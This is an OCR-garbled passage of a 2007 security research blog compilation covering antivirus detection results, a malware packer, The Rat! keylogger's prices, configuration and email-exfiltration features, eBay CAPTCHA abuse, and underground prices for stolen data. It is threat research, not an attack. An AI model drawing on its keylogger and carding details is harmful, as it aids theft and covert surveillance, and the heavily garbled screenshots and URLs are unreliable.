AVG 7.5.0.447 03.09.2007 |Downloader.Generic3. VNC 
BitDefender 7.2 03.10.2007 |Generic.Malware.Sdid.C704C628 
CAT-QuickHeal |9.00 03.09.2007 Suspicious) - DNAScan 

ClamAV devel-20060426 | 03.10.2007 |: 

DrWeb 4.33 03.09.2007 DLOADER. Trojan 

eSafe 7 .0.14.0 03.08.2007 |suspicious Trojan/worm 
eTrust-Vet 30.6.3467 03.09.2007 |no virus found 

Ewido 4.0 03.09.2007 Jn 

FileAdvisor 1 03.10.2007 |no virus found 

Fortinet 2.85.0.0 03.09.2007 |W32/Delf.FHG!tr 

F-Prot 4.3.1.45 03.09.2007 W2/new-malware|Maximus 
F-Secure 6.70.13030.0 03.09.2007 |; d 

Ikarus T3.1.1.3 03.09.2007 wing2. -SuspectCre 

Kaspersky 4.0.2.24 03.10.2007 |: 

McAfee 4981 03.09.2007 |no 

Microsoft 1.2204 03.09.2007 |no virus found 

NOD32v2 2105 03.09.2007 Ja variant of Win32/TrojanDownloader.Delf.NQG 
Norman 5.80.02 03.09.2007 |Suspicious_F.gen 

Panda 9.0.0.4 03.09.2007 be iratenp sic NFE 

Prevx V2 03.10.2007 |: 1 

Sophos 4.15.0 03.09.2007 Mal/Packer 

Sunbelt 2.2.907.0 03.10.2007 |VIPRE.Suspicious 

Symantec 10 03.10.2007 Jno virus found 

TheHacker 6.1.6.073 03.09.2007 |nc 

UNA, 1.83 03.09.2007 |nec oul 

VBA32 3.11.2 03.08.2007 |: four 

VirusBuster 4.3.19:9 03.09.2007 Packed, SG 


It’s obvious 


major AV software doesn’t detect this one, but what you should keep in mind is the currently 
[1]flawed signatures based malware detection approach. That’s of course given someone’s 
considering [2]updating their AV software. In another analysis I'll come with another binary 
that all major AV vendors detect, but the second tier ones doesn’t. Host based IPS based 
protection and behaviour blocking, and the actual prevention of loading the script is the way 
to avoid the exploitation of the flaws in signatures based scanning protection. 


1. http: //ddanchev. blogspot .com/2006/01/why-relying-on-virus-signatures-simply.htm 


2. http: //ddanchev. blogspot .com/2006/07/anti-virus-signatures-update-it-could.htm 


3.3.14 Shots from the Malicious Wild West - Sample Two (2007-03-10 19:07) 
[x) 


] 


Pohernah 1.0.0 Public Version 


Compress 


pyccxak.com, kas 


[1]Packers are logically capable of rebooting the lifecycle of a binary and making it truly 
unrecognizable. The Pohernah Crypter is among the many recently released packers you 
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might be interested in taking a peek at. By the time a packer’s pattern becomes recognizable, 
a new one is introduced, and in special cases there are even packers taking advantage of 
flaws in an AV software itself. 


Compared to the common wisdom of malware authors being self-efficient and coming 
up with packers by 


Antivir 7.3.1.41 03.09.2007 no virus found 
4uthentium 4.93.8 03.09.2007 10 virus found 
Avast 4.7.936.0 03.09.2007 no virus found 
AVG 7.5.0,.447 03.09.2007 no virus found 
BitDefender riers 03.10.2007 no virus found 
CAT-QuickHeal 9.00 03.09.2007 (Suspicious) - DNAScan 
ClamAV devel-20060426 03.10.2007 no virus fount 
DrWeb 4.33 03.09.2007 no virus founc 
eSafe 7.0.14.0 03.08.2007 suspicious Trojan/Worm 
eTrust-Vet 30,6.3469 03.10.2007 0 virus found 
Ewido 4.0 03.09.2007 no virus found 
FileAdvisor 1 03.10.2007 no virus found 
Fortinet 2.85.0.0 03.09.2007 suspicious 
F-Prot 4.3.1.45 03.09.2007 no virus found 
F-Secure 6.70.13030.0 03.09.2007 no virus fount 
Ikarus T3,.1.1.3 03.09.2007 no virus foun 
Kaspersky 4.0.2,.24 03.10.2007 no virus found 
McAfee 4981 03.09.2007 no virus found 
Microsoft 1.2204 03.10.2007 no virus found 
NOD32v2 2105 03.09.2007 no virus found 
Norman 5.80.02 03.09.2007 Suspicious_F.gen 
Panda 9.0.0.4 03.09.2007 no virus found 
Prevxl V2 03.10.2007 no virus found 
Sophos 4.15.0 03.09.2007 Mal/Packer 
Sunbelt 2.2.907.0 03.10.2007 VIPRE Suspicious 
Symantec 10 03.10.2007 no virus found 
TheHacker 6.1.6.073 03.09.2007 no virus found 
UNA 1.83 03.09.2007 no virus found 
VBA32 3.11.2 03.10.2007 no virus found 
VirusBuster 4.3.19:9 03.09.2007 Packed/FSG 


themselves, we've already seen cases where investments in [2]purchasing commercial 
anti-debugging software is considered. You may find these [3]test results of various anti virus 
software against packed malware informative, which as a matter of fact truly back up my 
experience with the winning engines and their performance in respect to packed malware. 


File size : 6901 bytes 


MD5 : 6ce1283af00f650e125321c80bf42097 


SHA1 : 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1 


1. http://3.bp.blogspot .com/_wICHhTiQmrA/RbfZvofLd2I/AAAAAAAAAMO/Ui1DQLFj23Q/s200/tested_packers.bmp 
2. http: //ddanchev. blogspot .com/2007/01/technical-analysis-of-skype-trojan.htm 


3. http: //www.anti-malware.ru/doc/packers_support_08.2006. pdf 
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3.3.15 Shots from the Malicious Wild West - Sample Three (2007-03-10 20:27) 


Ww) The Rat! 7.0XP Control Center 


Keyloggers on demand, the so called zero day keyloggers ones created especially to be used 
in targeted attacks are something rather common these days. Among the many popular ones 
that remained in service and has been updated for over an year is The Rat! Keylogger. Here 
are some prices in virtual WMZ money concerning all of its versions : 


The Rat! 7.0XP - 29 WMZ 
The Rat! 6.0XP/6.1 - 22 WMZ 
The Rat! 5.8XP - 15 WMZ 
The Rat! 5.5XP - 13 WMZ 
The Rat! 5.0XP - 9 WMZ 

The Rat! 4.0XP - 8 WMZ 

The Rat! 3.xx - 7 WMZ 

The Rat! 2.xx - 6 WMZ 
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Version The | Files & Registry Name 
EXE Registry Value 
The Rat! 7.0xP | socketme. exe } 


ews the Directory and the Fie name the spy Dump shall be writed in 


c:\vat. log 


Hide your Dump file mm Systern Deectory 

@ Write Dump into System Drectory Filename. ext 

Ente: Dump file name (8.3 format) 
~Invisibiity & , ssing- - — 
@ Invisible ir efore Invisiblty Statt (msec.): (1000 
Phantom Mo 
@ Phantom Mode 


C:\Program Files\Internet Explorer VEXPLORE.EXE 


The Rat!'s Life :) 


@ Start Monitoring 11.04.2005 ¥ 


20:27:00 


@ Stop & Delete 11.04.2007 ¥ 


Hot Keys to Stop The Rat! 


Encryption Cc 
Watch CipBoard | Max 
E Encrypt spy dump E Bulfer Size } 
- Send mad 
@ Send spy dump on e-mail 
Authenbficahon SMTP [RFC-2554) 


*) 


&% Use Authentilication ~ogin 


mybestboo@mail.ru 


Existing Server (16 chars) 


etween : 
uccessiul sending : 
mun.) Field S 
SMTP server for mail sending 


mip. mail ru 


Field FROM (For mail.cu server this field and Login field is one are 
same] 


4sef_one 


mybestbox! ca meazilru 
Field TO (Erter E-mail adress Dumps wil be sended to} 


mybestbox rnvail.eu 


} -Notilication 


@ Display Notification Message on startup 


Cirl+ @ Shit+ 


a - 


Alt+ @ Divabke 


CtrleAlt+F1 2 


[Default] [Apply] [Save] [Exit ] 


An automated translation of its features : 


For the installation to the machines with the operating systems Windows xp, Windows 
2000 and on their basis. Finale - apotheosis! Let us recall again, for which we love our rodent: 
- the size of file- result is record small - 13 312 bytes in the nezapakovannom form (with the 
packing with use FSG, 6 793 bytes!). 

- not it detektitsya as virus by antiviryami. 

- it follows the buffer of exchange. 

- the system of invisibility and circuit of fayervola. 

- the fixation of pressure you klavish’ in the password windows and the console. 

- the sending of lairs on e-mail, with the support to autentifikatsii RFC - 2554. 

- the encoding of dump. 

- tuning the time of activation and time of stoppage 

- removal in the time indicated without it is trace and reloading. 


Digital fingerprints will follow as soon as | finish bruteforcing the password protected 
archives. 
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3.3.16 Photoshoping Your Reality (2007-03-10 20:45) 


“y - wh pend, pe ~~ 
| Hhatlessinhattiesburg.blogspot.com, 


s 
) 


-s 


Le ae eee os a ~ 


It’s not just [1]a stereotyped beauty model, advanced image editing tools and techniques can 
make you believe in, but they can also influence your understand of reality too as you can see 
in [2]Wired’s famous altered photos collection : 


" A picture is worth a thousand words, and Photoshop and similar tools have made it 
easier than ever to make those words fib. But while computers enable easier and better photo 
manipulation, it is hardly anew phenomenon. Here is a sampling of some of the more famous 
altered photographs from the last century. " 


Here’s a free service letting you [3]fake photos. WHere’s [4Janother one as well as [5]a 
variant of mine in relation to a [6]previous post. 
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3.3.17 Vladuz’s Ebay CAPTCHA Populator (2007-03-10 21:31) 


eBayCaptcha Populator » Overview Rating: 2.00 
eBayCaptcha Populator 1.1, by vladuz, eee ees 


released on Jan 25, 2007 


Ar 


oO 


wom 


tired of getting "For added security, P manned 
enter the verification code hidden in the 


ina) 


oo 
o 


plea: 


"message on eBay sites? 


image.’ 

Install our Firefox extension and that problem will S 
erscwetng W677» " 

go away! ee 

Everytime you get that message the extension More Previews » 

will automatically fill the code for you. 


Nice slideshow courtesy of eWeek providing [1]various screenshots related to Viaduz’s imper- 
sonation attacks on Ebay : 


"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay 
customers accounts and thus cause sharp spikes in bogus listings being taken down and 
relisted multiple times a day, he or she has the mythic reputation at this point to be credited 
as the cause. " 


Compared to diversifying its targets, permanently sticking to Ebay as the main target is 
already prompting the Web icon to put more efforts into tracking him down. [2]Last year 
for instance, [3]Jautomated bots exploited Ebay’s CAPTCHA and started self-recommending 
each other, but with [4]Vladuz’s Ebay CAPTCHA Populator, improving the quality of Ebay’s 
authentication process should get a higher priority than tracking him down as another such 
tool will follow from someone else out there. 


1. ft tp: / ww eveek.con/sLideshow/0, 1206 a-002474, 00. ag 

2. heep:/ /photost_ blogger .con/blogger/1999/1779/200/selexprofileck. jpg 

3. http: //ddanchev. blogspot . com/2006/08/but-of-course-its-pleasant-transaction. html 
4. https ://addons mozilla. org/mozilla/4381 


3.3.18 Ballistic Missile Defense Engagement Points (2007-03-11 21:33) 


Outstanding animation covering pretty much all of the current engagement points in case a 
missile is fired from anywhere across the world, total syncronization between air, land and 
naval force, and | must say the background music is excellent too. 


[EMBED] 


In a previous post, [1]Who Needs Nuclear Weapons Anymore? | provided my reflection 
on the overal shift of threats nowadays compared to the ones back in the Cold War days you 
may informative, as well as [2]an essay | wrote back in 1998. Cryptome’s [3]Eyeballing of 
Missile Defense is also worth going through. 


1. http: //ddanchev. blogspot .com/2006/02/who-needs-nuclear-weapons- anymore. htm 


2. http: //ddanchev. blogspot .com/2006/05/emp-attacks-electronic-domination-in.htm 


776 


3. http://cryptome.org/bmd/bmd-eyeball . htm 


3.3.19 Touching the Future of Productivity (2007-03-12 22:30) 


Visualization in military brienfings and intelligence gathering has been a daily [1]lifestyle 
of analysts for years, but combining visualization and touchscreens makes it the perfect 
combination to boost productivity. We’re very near to entering the stage where VR will not 
only save lifes in a war zone, but also allow a skilled and hard to replace warrior to operate a 
device while enjoying his Coke back home. [2]Great demonstration. Via [3]Defensetech. 


Go through related posts on visualization and its future impact on [4]information security and 
[5]intelligence as well. 


1, fttip://Adanchev. blogspot .con/2006/08 analyzing intel igence- analysts heal 
2. hevp://Link.brightcove.con/services/Linl/bepid607757641/bctid422563006 

3, http://my.defensetech.org/archives/008948. html 
4. 
5i 


ttp://ddanchev. blogspot .com/2006/03/visualization-in-security-and-new.htm 


ttp://ddanchev.blogspot.com/2006/01/visualization-intelligence-and.htm 
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3.3.20 Google Maps and Privacy (2007-03-12 22:47) 


| thought I’ve seen the best close-ups from Google Maps in[1] the top 10 naked people on 
Google Earth, but this screenshot is spooky as [2]the guy is even looking straight into the 
sky which makes it even more interesting catch. It proves ones thing, Google are capable of 
providing high-res satellite imagery, which they aren’t on a mass scale for the time being. Shall 
we speculate on the possible reasons why is this guy looking above, remotely controlled aerial 
surveillance device, but what’s the relation with Google Maps whatsoever? More at [3]Google 
Blogoscoped, as well as in [4]previous [5]posts related to the [6]topic. 


. http://googlesightseeing .com/2006/11/28/top- 10-naked-people-on-google-earth/ 
http://maps. google. com/maps?f=qkhl=enkamp; amp ; amp; q=15. 298683+19 .429651klayer=kie=UTF8&z=23k11=15 . 298684, 
19.429651&spn=0 .001291, 0.002698&amp ; amp ; amp ; t=kkom=1&i 
3. 
4. http: //ddanchev. blogspot .com/2006/04/threat-by- google-earth-has- just .htm 
5. 
6 
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3.3.21 Timeline of Iran’s Nuclear Program (2007-03-12 23:30) 


didn't nappen.. 
giant Gorpex” 
didn't happen... 


www.CoxAndForkum.com 


Iran’s a rising star these days. It’s not just that the country recently launched it’s [1]first 
missile into space despite efforts of the international community to ban its nuclear program, 
[2]got caught into obtaining sensitive military technology, is currently [3]helping the ene- 
mies(Hezbollah) of its enemies(the U.S) but also, have [4]Russia enriching their uranium 
in between legally [5]supplying them with technology and upgrade parts the U.S put [6Jan 
embargo on - business as usual. Here’s a very [7]in-depth and informative timeline of Iran’s 
entire nuclear program saga : 


"The Bush Administration has almost certainly not approved the timing of military oper- 
ations against Iran, and consequently any projection of the probable timing of such operations 
is neccessarily speculative. The election of Mahmoud Ahmadi-Nejad as Iran’s new president 
would appear to preclude a negotiated resolution of Iran’s nuclear program. The success of 
strikes against Iran’s WMD facilities requires both tactical and strategic surprise, so there will 
not be the sort of public rhetorical buildup in the weeks preceeding hostilities, of the sort that 
preceeded the invasion of Iraq. To the contrary, the Bush Administration will do everything 
within its power to deceive Iran’s leaders into believing that military action is not imminent. " 


Here’s another timeline, this time of [8]U.S-Iran contracts from 1979 until today. 


1. http://today.reuters.co.uk/news/articlenews.aspx?type=scienceNews&storyID=2007-02-25T102434Z_01_BLA533629 


2, http: / /ddanchey. blogepot.con/2001/04/transferring-sensivive-wilitary. bal 
3. http: //ddanchev. blogspot. com/2006/09/nezbolahs~use~of-uunanned- aerial. nea 
4, http://www, dzenian.o/iran,nove/publish/article 20804, ehtal 

5. http: //www.tan. eth. ch/nevs/av/detad a .cf?ID=17247 
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7. http: //www.globalsecurity.org/military/ops/iran-timeline. htm 
8. http: //www.cfr.org/publication/12806/timeline.html?breadcrumb=/2 


3.3.22 Threats of Using Outsourced Software - Part Two (2007-03-14 17:23) 
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[1]Continuing the [2]coverage on the U.S government’s [3]overall paranoia of using out- 
sourced software on DoD computers, even hardware - [4]firmware infections are still in a spy’s 
arsenal only - in a recent move by the Defense CIO office a tiger team has been [5]officially 
assigned to audit the software and look for potential backdoors : 


" The Pentagon is fielding a task force charged with testing software developed overseas, 
according to a Defense Department official. The “tiger team,” organized within the Defense 
ClO’s office, is ready to move to the implementation stage, said Kristen Baldwin, deputy 
director for software engineering and systems assurance in the Office of the Undersecretary of 
Defense for Acquisition, Technology, and Logistics. Baldwin spoke yesterday at the DHS-DOD 
Software Assurance Forum in Fairfax, Va. “Tiger team” is a software-industry term for a 
group that conducts penetration testing to assess software security. “Success means they 
understand where their focus needs to be and how to prioritize their efforts,” Baldwin said. 
“They understand the supply-chain impact on systems engineering, and are ready to move 
forward in an effort to mitigate assurance risk.” " 


There’s another perspective you should keep in mind. Looking for backdoors is shortsighted, 
as the software may come vulnerabilities-ready, so prioritizing whether it’s vulnerabilities or 
actualy backdoors to look for will prove tricky. The use of [6Jautomated source code auditing 
may prove valuable as well, but taking into consideration the big picture, if you were to 
track the vulnerabilities that could act as backdoors in U.S coded software - taking Windows 
for instance - compared to that of foreign software, you’ll end up with rather predictable results. 


The bottom line, does shipping an insecure software has to do with source code vulnera- 
bilities, or should the threat be perceived in relation to backdoor-shipped software? The 
true ghost in the shell however remain the yet undiscovered vulnerabilities in the software 
acting as vectors for installing backdoors, not the softwared itself shipped backdoor-ready. 
[7]Meanwhile, [8]are stories like [9]these [10]a violation of [L1]OPSEC by [12]themselves? | 
think they are. 


1. http: //ddanchev. blogspot . com/2007/01/threats-of -using-outsourced-software. html 
2, http: / /ddanchev blogspot. con/2006/06 /espionage-ghosts-busters.htal 

3, http: / /ddanchev. blogspot .com/2006/05/nealehy-paranoka tal 

4. netp://nevs. com. con/PCvhardvaretcantposetrootkittthreat /2100-7349_3- 616924, heal 
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5. 
. 
7 

8. 

9 

10. 


ttp://en.wikipedia.org/wiki/Operations_security_/%280PSEC{29 


12. http://www.dodccrp.org/events/2004/CCRTS_San_Diego/CD/papers/086. pdf 


3.3.23 Complexity and Threats Mind Mapping (2007-03-19 16:42) 
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The folks at Security-Database.com - who by the way expressed their excitement over my blog 
- just released an outstanding [1]mind mapping graph on the most common firefox security 
extensions used for various purposes starting from information gathering, and going up to 
data tampering : 


" FireCAT is based upon a paper we wrote some weeks before (Turning firefox to an ethi- 
cal hacking platform) and downloaded more than 25 000 times. We also thank all folks that 
encouraged us and sent their suggestions and ideas to make this project a reality. This initial 
release is presented as a mindmap and we are open to all your suggestions to make it a really 
good framework for all the community of security auditors and ethical hackers. We will make 
a special page for this framework soon to let you monitor this activity. " 
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Great idea, reminds of [2] Ollie Whitehouse’s excellent mind mapping of mobile device threats. 
The semantics of security when applied in a visualized manner have the potential to limit 
the "yet another malware variant in the wild" type of news articles, or hopefully help the 
mainstream media break out of the "echo chamber" and re-publishing myopia, thus covering 
the basics. 


Anyway, which is the most useful tool you'll ever encounter? It’s called experience 
Which is the most important threat to keep an eye on? It’s your inability of not knowing what’s 
going on at a particular moment, lack of situational awareness . 


1. http: //www.security-database.com/toolswatch/Security-Database-releases-FireCAT.htm 


2. http: //www.symantec.com/enterprise/security_response/weblog/2007/02/a_picture_is_worth_a_thousand.htm 
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3.3.24 Personal Data Security Breaches Spreadsheet (2007-03-19 17:30) 


The risk of identity theft across the states 


Colorado 


Virginia 


Buc 5 


New Mexico 


oO individual cases of security breaches 


Alaska by location and number of personal 
records exposed 
° State responses 
. _ 
Up to 50,000 people affected States with no breach 
7 @ Between 50,000 and 250,000 notification laws 
. 
P) 
Hawall & , States with beeach 
6 Between 250,000 and 500,000 notification laws 
applying to any 
S Between 500,000 and 2,000,000 agency of company 
States with beeach 
notification laves 
More than 2,000,000 people affected that do not apply 
Source: the Privacy Rights Clearinghouse to public agencies 


Graphic by Danny Dougherty - Stateline.org 


[1]Some stats try [2]to emphasize on the number of people affected while forgetting the key 
points | outlined in a previous post related to [3]why we cannot measure the real cost of 
cybercrime, and yes, duplicates among the affected people in any of the statistics available. 
The number of people affected will continue to rise, but that’s not important, what’s important 
is to identify the weakest link in this process, and for the time being, you’re a " data hostage 
"in order to enjoy your modern lifestyle - ever asked yourself [4]what’s gonna happen with 
your digital data after you’re gone? 


[5]Spreadsheet nerds, here’s something worth taking the time to around with, most im- 
portantly this huge dataset debunks the common myth of hackers taking the credit for the 
majority of personal data security breaches, whereas as you can see in the figures, on the 
majority of occasions - and it’s an ongoing trend - companies themselves should get into the 
spotlight : 


"On average, in 2005 personal records were compromised at a rate of 5.2 million a 
month. On average, in 2005 personal records were compromised at a rate of 5.8 million a 
month. Assuming a similar rate of growth, by November or December this year we we should 
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cross the 2.0 billion mark. This is a conservative estimate because many of the news stories 
we archived were conservative on their own estimates of how many records were lost in 
particular incidents, and because a small number of incidents are reported without details of 
how many personal records were compromised. 


View [6]figures and tables of this paper as a *.pdf. View pre-publication [7]draft of paper as 
a *.pdf. View [8]dataset of incidents as a *.xls. View University of Washington Press office 
[9]news release on this research. " 


Graphic presenting the risk of identity theft in the U.S only, based on the severity of data 
breaches, courtesy of the Danny Dougherty . 


1 
2 

3. 

4. http://ddanchev. blogspot .com/2006/09/afterlife-data-privacy.htm 

5. bttp://www.wiareport.org/index.php/43/6-million-personal-records-compromised-each-month-2-billion-in-tota 
7 

9. 


ttp://uwnews .washington.edu/ni/article.asp?articleID=31264 


3.3.25 Spam Comments Attack on TechCrunch Continuing (2007-03-19 17:49) 


Tracking Web 2.0) 


In a previous post | commented on [1]O’Reilly.com’s war on spam according to their statistics, 
and thought you might find the most recent [2]TechCrunch blog spam stats they’ve recently 
provided, informative as well : 


"On January 4 we reported that the [3]Akismet filter had [4]stopped a million soam comments 
from reaching TechCrunch. At that point we’d been using it for about nine months. The 
number of blocked spam comments is now two million, just ten weeks later. That works out to 
about 15,000 spam comments hitting TechCrunch every day . If we did not have Akismet, we 
couldn’t allow anonymous commenting here on TechCrunch. We used to go through all spam 
comments to pick out the occasional false positive and accept it. Now, there are just too many 
to go through. All comments marked by Akismet as spam get deleted almost immediately. " 


| turned blog comments off quite a while ago and to be honest, the best comments, rec- 
ommendations and tips, as well as people I’ve met through this blog, | received over email and 
backlinks. Keep ’em coming! Moreover, it’s not just the inability of service providers to [5]keep 
up with the aggresive generation of splogs, but malicious parties are already exploiting some 
of the fancy features that make blogs so flexible when it comes to personalization and social 
networking. Next time [6]Fortinet will come up with another advisory, this time discussing 
MySpace so consider it as a cyclical shift from one provider to another depending on the 
current defenses in place - blackhat SEO. 
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http: //ddanchev. blogspot . com/2006/06/dealing-with-spam-oreillycom-way .htm 


ttp://www.techcrunch.com/2007/01/04/thank- you-akismet/ 


1. 
2. 
3. 
4. 
Di 
6. 


3.3.26 Subconscious Search Monopoly Sentiments (2007-03-19 18:26) 


A REMINDER 


ptoem 


YOUR FRIENDS AT MICROSOFT 


And hey, that’s from someone attending the Microsoft MVP for N-th time : 


"| was invited to attend the Microsoft MVP Summit last week. If you want to Know what 
the Summit is about or what a MS MVP is, Google is your friend . " 


Microsoft’s MVP is a great corporate citizenship tool, whereas empowering and crediting 
the individual on a wide scale compared to internal reputation benchmarking is an indirect 
use of the "act as an owner" management tactic - implement it. Supporting existing standarts 
- look up [1]interoperability - benefits us all, reinventing the wheel without an unique vision 
besides ever increasing (projected) profit margins, wouldn’t even benefit the company in the 
long term. 


If you truly want to disrupt, disrupt by first (legally) taking the advantage of using some- 
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one else’s already developed foundations to do so, the rest is attitude and hard to immitate 
competitive advantages. [2]Good brainstorming questions in Anil’s post whatsoever. 


1. http: //en. wikipedia. org/wiki/Interoperabilit 


2. http://www. aniltj.com/blog/2007/03/17/MicrosoftMVPSummit2007Recap.aspx 


3.3.27 The Underground Economy’s Supply of Goods (2007-03-19 23:17) 


Advertised Price 
Item (in US Dollars) 
United States-based credit card with card verification value $1-$6 
United Kingdom-based credit card with card verification value $2-$12 
An identity {including US bank account, credit card, date of birth, and $14-$18 
government issued identification number} 
List of 29,000 emails $5 
Online banking account with a $9,900 balance $300 
Yahoo Mail cookie exploit—advertised to facilitate full access when successful $3 
Valid Yahoo and Hotmail email cookies $3 
Com promised computer $6-$20 
Phishing Web site hosting—per site $3-5 
Verified PayPal account with balance (balance varies) $50-$500 
Unverified PayPal account with balance (balance varies) $10-$50 
Skype account $12 
World of Warcraft account—one month duration $10 


Table 3. Advertised prices of items traded on underground economy servers 
Source: Symantec Corporation 


Symantec ([1]SYMC) just released their latest [2]lnternet Security Threat Report, a 104 pages 
of rich on graphs observations, according to the data streaming from their sensor network : 


"Volume XI includes a new category: “Underground Economy Servers”. These are used 
by criminals and criminal organizations to sell stolen information, including government- 
issued identity numbers, credit cards, bank cards and personal identification numbers (PINs), 
user accounts, and email address lists. To reduce facilitating identity theft, organizations 
should take steps to protect data stored on or transmitted over their computers. It is critical 
to develop and implement encryption to ensure that any sensitive data is protected from 
unauthorized access. " 


In between their coverage on various segments such as vulnerabilities, phishing, spam, 
and yes malware despite that I’m having my doubts on SMTP as the major propagation vector 
on a worldwide scale, | came across to a nice figure summarizing their encouterings while 
browsing around various forums and web sites. 


The question is - why are these underground goods cheaper than a Kids’ menu at Mc- 
Donalds as I’ve once pointed out at O’Reilly’s Radar post on [3]spamonomics? Because in 
2007 we can easily speak of " malicious economies of scale " thus, profit margin gains despite 
the ongoing [4]zero day vulnerabilities cash bubble at certain forums, doesn’t seem to be 
that very important. So can we therefore conclude that greed isn’t the ultimate driving force, 
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but trying to get rid of the stolen information in the fastest way possible in between taking 
into consideration its dissapearing exclusiveness with each and every minute? The principle 
goes that a dollar earned today is worth more than a dollar earned tomorrow, but how come? 
Simple, by tomorrow the exclusiveness of your goods might by just gone, because the affected 
parties detected the leaks and took actions to prevent the damage. 


Issues to keep in mind regarding the graph: 


Harvested spam databases have been circulating around for years and so turned into a 
commodity, for instance, | often come across geographically segmented databases or per 
email provider segmented ones, not for sale, but for free. So how come the "good" is offered 
for free? It’s obviously fine for the "good" to be offered for free when there’s a charge 
for service, the service of verifying the validity of the emails , the service of encoding the 
message in a way to bypass anti spam filters , and the service of actually sending the messages 


Where’s the deal of a malicious party when selling an online banking account with a $9,900 
balance for just $300? For me, it’s a simple process of risk-forwarding to a party that is actually 
capable of getting hold of the cash 


Yahoo and Hotmail email cookies per piece? Next it will be an infected party’s clickstream for 
sale , and you'll have the malicious parties competing with major [5]ISPs who are obviously 
selling yours for the time being. 


Compromised computers per piece? Not exactly. [6]Entire botnets or the utilization of the 
possible services offered on demand for a price that’s slightly a bit higher than the one pointed 
out here. 


Psychological imagation is just as important as playing a devil’s advocate to come up with sce- 
nario building tactics in order to protect your customers and yourself from tomorrow’s threats. 


Related images: 


[7]lsurveying potential buyers of zero day vulnerabilities in order to apply marginal thinking in 
their proposition 


advertisement for [8]selling zero day vulnerabilities 
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listing of [9]available exploits 


[10]zero day vulnerabilities [11]shop, I’m certain it’s a [12]PHP module that’s currently hosted 
somewhere else 


[13]the WebAttacker toolkit 
- [14]The RootLauncher 
- [15]The Nuclear Grabber and [16]geolocated infections- site dissapeared already 


1 
2 

3 

‘ 
5 

6. : li ity. = 2 

ds : 4 ; 

8. : : 7 j 

9. 


ttp://www.linuxsecurity.com/docs/malware-trends.pdf 


http: //photos1. blogger. com/blogger/1933/1779/1600/O0day_survey.1.png 


ttp://photos1.blogger.com/blogger/1933/1779/1600/xshop_2005. jpg 
ttp://photos1.blogger.com/blogger/1933/1779/1600/WebAttacker1 .0. png 


10. http://photos1. blogger . com/blogger/1933/1779/1600/International_Exploits_Shop.1. jpg 

11. http://photos1. blogger .com/blogger/1933/1779/1600/International_Exploits_Shop/20-%20Products2. jpg 

12. http://photos1. blogger . com/blogger/1933/1779/1600/International_Exploits_Shop%20-%20Products1. jpg 

13. http://4.bp. blogspot .com/_wICHhTiQmrA/Rd4wewiIS9I/AAAAAAAAASw/dfai0Vk9ZuI/s1600-h/webattacker . jpg 

14. bttp://2.bp. blogspot .com/_wICHhTiQmrA/Rd4vVQiIS8I/AAAAAAAAASO/QDGIkHdb610/s1600-h/rootkit_launcher . jpg 


15. http://photos1. blogger . com/blogger2/4099/2257/1600/nuclear1.png 
16. http://photos1. blogger .com/blogger2/4099/2257/1600/adm2. png 
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3.3.28 ASCII Art Spam (2007-03-20 16:45) 


foo = fier, es 
Pp thy, A i fey THY 
fae ao a [ey Oe 
\/ ay He J A. v8 V 
ee ae oe [° fea 
oh sl | | fo 2 
tras © 58 / \ a 
f! \ | rs / \ 
| . 3 4 ro. & | 
\/ 4% | # \/ 
/ “4 4 i ee \ 
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: # \ | | % 
-' yt \ 4 3 , 3 / _— 
[et Ss . | ’ ¢¥ i ia: 
. 7 \ | [ i a 
‘=/\ uf 1° we A | # ‘| yi ‘\-! 
||>---! { 4 | | ey ---'|| 
‘4 fs ia £7 ¢ 4 if 
I fi. & a ae I 
424 7 aia a 2 SL pet 
{ “4 | | & & 4 | A) 
. x l | 4 | | A oA 
rf | \ \ Ey / ; 4 
e 1 i, » TT ot ee 


A [1]spammer’s biggest trade off - making it through anti-spam filters doesn’t mean the email 
receipt will even get the slightest chance of understanding what he’s about to get scammed 
with. 


"We have seen SPAM using [2]ASCII ART in order to avoid being detected by antispam 
filters. Most of the times, they try to show different words (Viagra, etc.) using this technique, 
but this is the first time | have seen them showing a picture. It is not a very high quality one, 
but I’ve tried it with some different antispam filters and they have been fooled. " 


Here’s an [3]old school ASCII generator you can play around with, and a [4]related im- 
age from a previous post on [5]Joverperforming spammers. 


1 
2. 
3 
4 
5. 
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3.3.29 Jihadists Using Kaspersky Anti Virus (2007-03-20 17:01) 


| Wy 53% - Update 
Update : running 


Downloading: 


JShia Coy Audi) Cytns oo 
Location: 
_ Or 


Update size: 3.3 M8 Start time: 11/27/2006 21:56:26 
Traffic: 1.8 MB Duration: 00:02:53 
Transfer rate: 10.64 Kb/s Finish time: 11/27/2006 22:01:47 


Events Settings 


Event Object Name Time Traffic “ 
iv) File downloaded 11/27/2006 21:58:29 997byte 
iv) File downloaded 11/27/2006 21:58:33 141.0 K8 
@ File downloaded 11/27/2006 21:58:44 295,2KB 


diffs/bases/as/kis/profiles.pdb.apa 
bases/ids/6b/ids00 14f.kdz 
bases/ids/6b/idsbase. kdz 


@ File downloaded 
@ File downloaded 
@ File downloaded 
Q@ File downloaded 
@ File downloaded 
@ File downloaded 
@ File downloaded 


bases/ids/6b/Mer.kdz 
bases/ids/6b/Mfw.kdz 
bases/ids/6b/klick.kdz 
bases/ids/6b/Kiin.kdz 
bases/ids/6b/kistm.kdz 
bases/ids/6b/ckah.set 
beses/espy/aphish.dat 


4 | 


it 


11/27/2006 21:58:48 
11/27/2006 21:58:52 
11/27/2006 21:58:56 
11/27/2006 21:59:05 
11/27/2006 21:59:11 
11/27/2006 21:59:13 
11/27/2006 21:59:17 


32.5 KB 
48.2K8 
110.2KB 
96.7 KB 
31.4K8 
687 byte| ~ 
31.3KB + 


| Show all events 


@ Help <Sack Next> BramjneT.Com 


| wonder what are the low lifes actually protecting themselves from? Malware attacks in prin- 
ciple, or preparing to prevent a [1]malware infection courtesy of an unamed law enforcement 
agency given their interest in coding malware : 


" German police officials have expressed interest in developing software tools to help 
them surveil computer users who may be involved in crime. The tools might include types 
of software similar to those used in online fraud and theft schemes, such as programs that 
record keystrokes, logins and passwords. Security companies, however, are asserting that 
they wouldn’t make exceptions to their software to accommodate, for example, Trojan horse 
programs planted by law enforcement on users’ computers. 


This is a very contradictive development that deserves to be much more actively debated 
around the industry than it is for the time being. Law enforcement agensies and intelligence 
agencies have always been interested in zero day vulnerabilities and firmware infections, thus 
gaining a competitive advantage in the silent war . Among the most famous speculations 
of an intelligence agency using malicious code for offensive purposes is the infamous [2]CIA 
infection/logicbomb of Russian gas pipeline : 


790 


" While there were no physical casualties from the pipeline explosion, there was signifi- 
